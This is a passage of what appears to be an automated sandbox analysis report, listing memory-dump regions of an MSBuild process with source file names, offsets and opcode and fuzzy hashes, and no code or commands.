                                                                                                                                    • Source File: 0000000C.00000002.2506743042.00000000026B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_12_2_26b0000_MSBuild.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: f061d890386729edf05c8fdd2fb59bfad6fa9feb4e3ddaeaff199f1d7aac7fb6
                                                                                                                                    • Instruction ID: 3b1ebc9e9876dde22e95b0ed5a8a5544e57a19078fedac07cd1704f12a8124be
                                                                                                                                    • Opcode Fuzzy Hash: f061d890386729edf05c8fdd2fb59bfad6fa9feb4e3ddaeaff199f1d7aac7fb6
                                                                                                                                    • Instruction Fuzzy Hash: F8A1D170900208CFEB24DFA9C948BDDBBB1FF89305F208269D509AB3A5DB759985CF54
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000C.00000002.2506743042.00000000026B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_12_2_26b0000_MSBuild.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 6167694de02768acf63b058d886bebab80ddf66e70f87324dade0fb30d240dff
                                                                                                                                    • Instruction ID: 279ed597d1bb6d25ee694e14888e18aa1a7a7084119e305b8a3f0745249c1e16
                                                                                                                                    • Opcode Fuzzy Hash: 6167694de02768acf63b058d886bebab80ddf66e70f87324dade0fb30d240dff
                                                                                                                                    • Instruction Fuzzy Hash: 6A91F070D00208CFEB24DFA9C988BDDBBB1FF89315F208259E509AB291DB759985CF54
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000C.00000002.2506743042.00000000026B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_12_2_26b0000_MSBuild.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: a22ae17dac4e2a7ed1f1e0e16e6d03ada8387b046a3ba3ccf41a32676daa6b98
                                                                                                                                    • Instruction ID: b41a873389aada1aa69b6bd9291140acf907fa321fc45e65d7ba55d7d76cd1bc
                                                                                                                                    • Opcode Fuzzy Hash: a22ae17dac4e2a7ed1f1e0e16e6d03ada8387b046a3ba3ccf41a32676daa6b98
                                                                                                                                    • Instruction Fuzzy Hash: 6F41E375D01208CBEB18CFAAD9447DDBBF2BF88304F24D12AC815AB269DB395945CF50
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000C.00000002.2506743042.00000000026B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_12_2_26b0000_MSBuild.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 0ohp$Ljhp$Ljhp
                                                                                                                                    • API String ID: 0-1378888368
                                                                                                                                    • Opcode ID: e448f451a1b7d08f497cc0912125a9aba3075e4364ff8b1d8362dc9c1f53852f
                                                                                                                                    • Instruction ID: 1a89cb7a15f549010be8e614d0c19199e38d072abe1793f124014eba66829646
                                                                                                                                    • Opcode Fuzzy Hash: e448f451a1b7d08f497cc0912125a9aba3075e4364ff8b1d8362dc9c1f53852f
                                                                                                                                    • Instruction Fuzzy Hash: 9751C274E00248DFDB48DFA9D594ADDBBF2BF89300F20846AE815AB365DB349842CF10
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000C.00000002.2506743042.00000000026B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_12_2_26b0000_MSBuild.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 0-3916222277
                                                                                                                                    • Opcode ID: 9c6c69806de0d75cb908583a50657cff8b1180d886aac64f6afb6d6c95b69546
                                                                                                                                    • Instruction ID: 6d450c5868651864eabc0b397400780837e9724937f5a0037700fbb5b1ad3a85
                                                                                                                                    • Opcode Fuzzy Hash: 9c6c69806de0d75cb908583a50657cff8b1180d886aac64f6afb6d6c95b69546
                                                                                                                                    • Instruction Fuzzy Hash: 35610730B002448FDB166B78D91467E3BA2FF89364F14852AE962DB3D1DF398D42C791
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000C.00000002.2506743042.00000000026B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_12_2_26b0000_MSBuild.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 0-3916222277
                                                                                                                                    • Opcode ID: ed80a9f00f89455eae4c407bc1d5762aacbea9b3698d3b969922b38fbe7b0b60
                                                                                                                                    • Instruction ID: 15df6c3405f389cf29aad795c99f9cc1b0a4113d8552bc901e3679ea269bc84a
                                                                                                                                    • Opcode Fuzzy Hash: ed80a9f00f89455eae4c407bc1d5762aacbea9b3698d3b969922b38fbe7b0b60
                                                                                                                                    • Instruction Fuzzy Hash: 3981F730B001449FDF266F7899546BD3BA2FF85369F24812AE9229B3D1DF358D82C791
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000C.00000002.2506743042.00000000026B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_12_2_26b0000_MSBuild.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: c733c81f305ffcc3788f723410b5cc31eada937a2f24e034932d309375dc305c
                                                                                                                                    • Instruction ID: 5f2c89799069ae3d591a9a6622a55566844699f8e6d77f2578f5965e772120de
                                                                                                                                    • Opcode Fuzzy Hash: c733c81f305ffcc3788f723410b5cc31eada937a2f24e034932d309375dc305c
                                                                                                                                    • Instruction Fuzzy Hash: 6DD1D671B041048FCB15DB78D451AEE7BB2EF89324F284065E906EB391DB35DD81CBA1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000C.00000002.2506743042.00000000026B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_12_2_26b0000_MSBuild.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 51fc0c53e67d44b88e18743253ae22cf64ca854b165e1ab79a1eccbbe2a69d13
                                                                                                                                    • Instruction ID: 0d2a866e0e415c6b2d771afb066805b7120e911cc56933412b418159e5daded4
                                                                                                                                    • Opcode Fuzzy Hash: 51fc0c53e67d44b88e18743253ae22cf64ca854b165e1ab79a1eccbbe2a69d13
                                                                                                                                    • Instruction Fuzzy Hash: 3161C472B006059FCB25DBB9D844AAEBBB9EFC8324B14853BE519D7340D732D9418BA0
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000C.00000002.2506743042.00000000026B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_12_2_26b0000_MSBuild.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 18ac7cf080c7f52f3b763152ddea0f56cb86bb108badd6e9ae5dd2ef6048d9b3
                                                                                                                                    • Instruction ID: 268cc13a816ffc18f753f39abf2593d151964758a5d66cc91893f8a7cd0e457f
                                                                                                                                    • Opcode Fuzzy Hash: 18ac7cf080c7f52f3b763152ddea0f56cb86bb108badd6e9ae5dd2ef6048d9b3
                                                                                                                                    • Instruction Fuzzy Hash: 89A1E974A00609CFCF45EFA8E894A9DBBB2FF88309F104569D405AB369DB746D45CF90
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000C.00000002.2506743042.00000000026B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_12_2_26b0000_MSBuild.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 0ff0e176b0aa34ab6e82026cc844bde4f4fece37b8414ead6b3dde69cafc109a
                                                                                                                                    • Instruction ID: 0da0353d7404b677dc06417aa18f24999784a7e88691f0130b60383ccfa115cd
                                                                                                                                    • Opcode Fuzzy Hash: 0ff0e176b0aa34ab6e82026cc844bde4f4fece37b8414ead6b3dde69cafc109a
                                                                                                                                    • Instruction Fuzzy Hash: 74A1D974A00609CFCF45EFA8E884A9DBBB2FB88309F108569D405AB369DB746D45CF90
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000C.00000002.2506743042.00000000026B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_12_2_26b0000_MSBuild.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: c9e8d2301c21d14bbafca492df6f11e05e9b02da66b53656d0fb1f94d6a5b1fd
                                                                                                                                    • Instruction ID: c6161b61455df73941ee726ca6ddc76d813db352fe6751c4aef1b668ae037e10
                                                                                                                                    • Opcode Fuzzy Hash: c9e8d2301c21d14bbafca492df6f11e05e9b02da66b53656d0fb1f94d6a5b1fd
                                                                                                                                    • Instruction Fuzzy Hash: 3B41F431B002089FCB15EBB9D8156AE7FB6EF89305F1440BAE906DB351DE359D42CBA0
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000C.00000002.2506743042.00000000026B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_12_2_26b0000_MSBuild.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 5187892f1a984418df3823cd2eb2c5da8e70fde4811fa96e85dcdc7327f7d0a7
                                                                                                                                    • Instruction ID: 3d6fe8cf1513ce8fb3b0b317e03cad698254efe67268d4f2ce38b205464ce7f6
                                                                                                                                    • Opcode Fuzzy Hash: 5187892f1a984418df3823cd2eb2c5da8e70fde4811fa96e85dcdc7327f7d0a7
                                                                                                                                    • Instruction Fuzzy Hash: 7531B235B04219CBDF6E5A6588A43BE7AE6BFC4305F18413BDD06D73D1DB7488898361
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000C.00000002.2506743042.00000000026B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_12_2_26b0000_MSBuild.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 75e3cb4f64be93173610d57faef7c27ae2a83b291c3b3d91726f82fca23c8e52
                                                                                                                                    • Instruction ID: 42064c0755ed7ee9cb200e11cf87ca430b3469d67dbc16b3faf2bcb381b19474
                                                                                                                                    • Opcode Fuzzy Hash: 75e3cb4f64be93173610d57faef7c27ae2a83b291c3b3d91726f82fca23c8e52
                                                                                                                                    • Instruction Fuzzy Hash: 2241C174E012089FDB48DFAAD894ADDBBB2BF89300F249469E805BB364DB349845CF14
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000C.00000002.2506743042.00000000026B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_12_2_26b0000_MSBuild.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 3c08fada9e47e50948307646d08be8d49d5a505b216fdb08f99d3742016ea872
                                                                                                                                    • Instruction ID: 7dca481d970ee54c0a0ba5a09d3fed432e5e3cc366722ce167b55465636876ed
                                                                                                                                    • Opcode Fuzzy Hash: 3c08fada9e47e50948307646d08be8d49d5a505b216fdb08f99d3742016ea872
                                                                                                                                    • Instruction Fuzzy Hash: 5931A37442262A9FD2692F32A6AD27A7BB4FB4F3137486D01E54EC051A9B7A3844CF50
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000C.00000002.2506743042.00000000026B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_12_2_26b0000_MSBuild.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 5a041464b0af69d53e366cb7c489801205281b8addaf1d961fcca96dd998828a
                                                                                                                                    • Instruction ID: b5e2353bb931d3ecfc43f9e2d277ae5f2746013fdf8b246c4e37f230dec52e33
                                                                                                                                    • Opcode Fuzzy Hash: 5a041464b0af69d53e366cb7c489801205281b8addaf1d961fcca96dd998828a
                                                                                                                                    • Instruction Fuzzy Hash: 69311B35B001098FCB46EBA8C480EDD7BB2EF88324F595595E501EB365CB71EC85CBA0
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000C.00000002.2506743042.00000000026B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_12_2_26b0000_MSBuild.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 2d2a7561a93cd29f07e0d09bc9e4c26f98ef80633204d3647ecf92a0f0299e30
                                                                                                                                    • Instruction ID: 2df9a36cf43d2f5e45a505406d7f9a38d0417f82c4f9db747a217a222c9309fa
                                                                                                                                    • Opcode Fuzzy Hash: 2d2a7561a93cd29f07e0d09bc9e4c26f98ef80633204d3647ecf92a0f0299e30
                                                                                                                                    • Instruction Fuzzy Hash: 04313B35B001098FCB46EBA8C480EDD7BB2EF88324F595594E501EB366CB71EC85CBA0
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000C.00000002.2506743042.00000000026B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_12_2_26b0000_MSBuild.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: a5733444efeae41842c5264cfa2e23f18d38c9d3f8f23c7404ebae104d585fcd
                                                                                                                                    • Instruction ID: 0fe51464faaaae2dd196c7157e5903bb31906b3444f4d547ab9fa9e32b0130d9
                                                                                                                                    • Opcode Fuzzy Hash: a5733444efeae41842c5264cfa2e23f18d38c9d3f8f23c7404ebae104d585fcd
                                                                                                                                    • Instruction Fuzzy Hash: ED31A2347001099FCB09EF79C951A6EBBB6FF88354F248069E9069B361DF359E46CB90
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000C.00000002.2506030292.0000000000C1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C1D000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_12_2_c1d000_MSBuild.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 07ce7fc661c8ea20563dfb5e4dda490693df44d10df9730afe697304d0a66651
                                                                                                                                    • Instruction ID: 70cb2769c87be7d423b3496ff580fbb3aae5261a8d03a232191052bad95920bf
                                                                                                                                    • Opcode Fuzzy Hash: 07ce7fc661c8ea20563dfb5e4dda490693df44d10df9730afe697304d0a66651
                                                                                                                                    • Instruction Fuzzy Hash: 7D31597550D3C49FCB138B24C990711BF71AB47214F29C5EBD8898B2A3C23A984ADB62
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000C.00000002.2506743042.00000000026B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_12_2_26b0000_MSBuild.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 7552241a58fdf28ab1c371d37cc55b26a93484592893fad2903ffcc00c905e74
                                                                                                                                    • Instruction ID: 6b1d564c5597bffcea5a42a4b09c2486c93c686e9f26e4de5708ac50408a46a4
                                                                                                                                    • Opcode Fuzzy Hash: 7552241a58fdf28ab1c371d37cc55b26a93484592893fad2903ffcc00c905e74
                                                                                                                                    • Instruction Fuzzy Hash: 1C21B031A00216EFCF55EBA4C4509EE37A5EFCE260B60C499D90D9B340DB30EA46CB81
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000C.00000002.2506030292.0000000000C1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C1D000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_12_2_c1d000_MSBuild.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: e02ecc4eff90ad912972ad98f8875e5e865a271d95e60b72acec9c59020617c9
                                                                                                                                    • Instruction ID: 074bcef35d3ac754d923a32dc8c5136b5c71ed20671b41f61e893ae1b61a312f
                                                                                                                                    • Opcode Fuzzy Hash: e02ecc4eff90ad912972ad98f8875e5e865a271d95e60b72acec9c59020617c9
                                                                                                                                    • Instruction Fuzzy Hash: 7D213475504200DFCB15DF18D9C0B26BBA1FB89314F34C66DE80A0B296C33AD887DA62
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000C.00000002.2506743042.00000000026B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_12_2_26b0000_MSBuild.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: e2c93aaa9e33afab52c7d783bf6064eee4c67c4d78984b49ae496c29bae195d1
                                                                                                                                    • Instruction ID: e3022ccd12242109469e6ec71216cbd8b135386270926ea0b505a9912ec8cf31
                                                                                                                                    • Opcode Fuzzy Hash: e2c93aaa9e33afab52c7d783bf6064eee4c67c4d78984b49ae496c29bae195d1
                                                                                                                                    • Instruction Fuzzy Hash: B4214F74A04208EFDB0AEFB8D4446AEBBB6EF86708F1084ED94149B355DB748A85CF51
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000C.00000002.2506743042.00000000026B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_12_2_26b0000_MSBuild.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: a6d4d8fe1781489e44b856e2fc7feeb2cd1ddc2155233d248570d50c78235ef2
                                                                                                                                    • Instruction ID: b5dc9f064d8be74ea0234c2469efb5f1ccdcf33245324855e05bc2bd1c4799b6
                                                                                                                                    • Opcode Fuzzy Hash: a6d4d8fe1781489e44b856e2fc7feeb2cd1ddc2155233d248570d50c78235ef2
                                                                                                                                    • Instruction Fuzzy Hash: 36210371C05249CFCB42DFA8C8545EEBFB0BF4A200F0445AAD405FB222EB344A85CBA5
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000C.00000002.2506743042.00000000026B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_12_2_26b0000_MSBuild.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 5e3277ee539c33861cdba58851f7b91b155a44555a7ec1c486c14837bdc62c78
                                                                                                                                    • Instruction ID: 00478a8983ff4ae951e0e8dfd69c8f62edccdd1fb4115704ed55ef29b0507814
                                                                                                                                    • Opcode Fuzzy Hash: 5e3277ee539c33861cdba58851f7b91b155a44555a7ec1c486c14837bdc62c78
                                                                                                                                    • Instruction Fuzzy Hash: F8113A36300214CFD715DB69D984EA6B7E6EF88725F2084AAE6498B365CF71EC44CB50
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000C.00000002.2506743042.00000000026B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_12_2_26b0000_MSBuild.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 85369191242ea3d258623b54a2822403b5461ec8a4db28c6e6cc8abe5083c3c4
                                                                                                                                    • Instruction ID: a9b2c6e8bd1e9c7f09449538e1c7d4f6b9dbb7efff778b17a7cddb5a8b847e03
                                                                                                                                    • Opcode Fuzzy Hash: 85369191242ea3d258623b54a2822403b5461ec8a4db28c6e6cc8abe5083c3c4
                                                                                                                                    • Instruction Fuzzy Hash: F701F532F002818FDF155AB988546BE7BEAAFC8228751443ADA05CB316EF30CC018761
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000C.00000002.2506743042.00000000026B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_12_2_26b0000_MSBuild.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: c0842d3c0c696f85d19c3615aabe0057d71c7d2ce2a0f7c2ed6c8958d676d2e0
                                                                                                                                    • Instruction ID: 8c328c7966321a464bc3bdfd23f7a40cc7cfbdf6e3a6306994b32060e43f8eda
                                                                                                                                    • Opcode Fuzzy Hash: c0842d3c0c696f85d19c3615aabe0057d71c7d2ce2a0f7c2ed6c8958d676d2e0
                                                                                                                                    • Instruction Fuzzy Hash: 09115B70A04248DFCB16EFB4D0506EEBBB6EF86308F1084E9D8455B796CB785989CF91
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000C.00000002.2506743042.00000000026B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_12_2_26b0000_MSBuild.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 1c6722a1138dbad030357e794274dd5ea46730084b8936352e5bbf1100c7a93b
                                                                                                                                    • Instruction ID: 30bc553132572fbab10bc2f7a45a9a26db19512a05c54032133eff3b5569cc7e
                                                                                                                                    • Opcode Fuzzy Hash: 1c6722a1138dbad030357e794274dd5ea46730084b8936352e5bbf1100c7a93b
                                                                                                                                    • Instruction Fuzzy Hash: 8F118B31300200CFD715CB2AD984BA677E5EF88729F2080A9E5498B364CF71EC40CB10
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000C.00000002.2506743042.00000000026B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_12_2_26b0000_MSBuild.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: fd9cb217ca6931076c83fdb459be6b331ba895027ea76c8801f75e44b5a70c76
                                                                                                                                    • Instruction ID: 69af9c2204a4337f4fe85910ad26c1954c23733f7f1c9c16b9ca5bb90191cd91
                                                                                                                                    • Opcode Fuzzy Hash: fd9cb217ca6931076c83fdb459be6b331ba895027ea76c8801f75e44b5a70c76
                                                                                                                                    • Instruction Fuzzy Hash: 9401D632F002518FDF15ABB9885466F7AEBAFC8568350443EDA05CB315FF70C80087A1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000C.00000002.2506743042.00000000026B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_12_2_26b0000_MSBuild.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: daaffd3ae960914ebc9d589d6b119fe5489d29fc2175f248fd86b5af42d4b2f9
                                                                                                                                    • Instruction ID: a7e4a8ee2583e61b7d0aa03a4e0a7e2a160553c9ed0ac8ad3840a4915942d84b
                                                                                                                                    • Opcode Fuzzy Hash: daaffd3ae960914ebc9d589d6b119fe5489d29fc2175f248fd86b5af42d4b2f9
                                                                                                                                    • Instruction Fuzzy Hash: D1014075A102099FCB64AFA9D9445AE7BB5FF88311B004439E91697341DB359D10CBA1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000C.00000002.2506743042.00000000026B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_12_2_26b0000_MSBuild.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 49ab13cdb7bd0886f20c3e7884f2aa37137543cf99529603506d2ee992c675ab
                                                                                                                                    • Instruction ID: 64cc4655f6802466916cc034fd40ffd8ebf634358da342de16fc1c1e38ea2ee5
                                                                                                                                    • Opcode Fuzzy Hash: 49ab13cdb7bd0886f20c3e7884f2aa37137543cf99529603506d2ee992c675ab
                                                                                                                                    • Instruction Fuzzy Hash: 4A017C72A0020A9FCB65DFB9E9549EE7FB5FF88311B10402AE919D3240DB354E10CB91
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000C.00000002.2506743042.00000000026B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_12_2_26b0000_MSBuild.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: af608bafbacbb8e38feb3830d09c5dc56cf1ab2a6b910a543e91472137a99717
                                                                                                                                    • Instruction ID: 98343dd6ccb116686aed8c201fe3343b7a5e90cf4937d6de5775280a9dbc40cc
                                                                                                                                    • Opcode Fuzzy Hash: af608bafbacbb8e38feb3830d09c5dc56cf1ab2a6b910a543e91472137a99717
                                                                                                                                    • Instruction Fuzzy Hash: D3F0C8317002445BCB152A75D90957E3F9AEBC9715B14442AEA06C7341DE3ACC42D790
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000C.00000002.2506743042.00000000026B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026B0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_12_2_26b0000_MSBuild.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: b4f3e7d078eb56576f0be1c62c0756d8094ca7ecf1470db08fd93b673f0a5c2c
                                                                                                                                    • Instruction ID: 30989d1922606af3db94fde2d8fcb457b27bb0229ee21b71881914930d1e2d82
                                                                                                                                    • Opcode Fuzzy Hash: b4f3e7d078eb56576f0be1c62c0756d8094ca7ecf1470db08fd93b673f0a5c2c
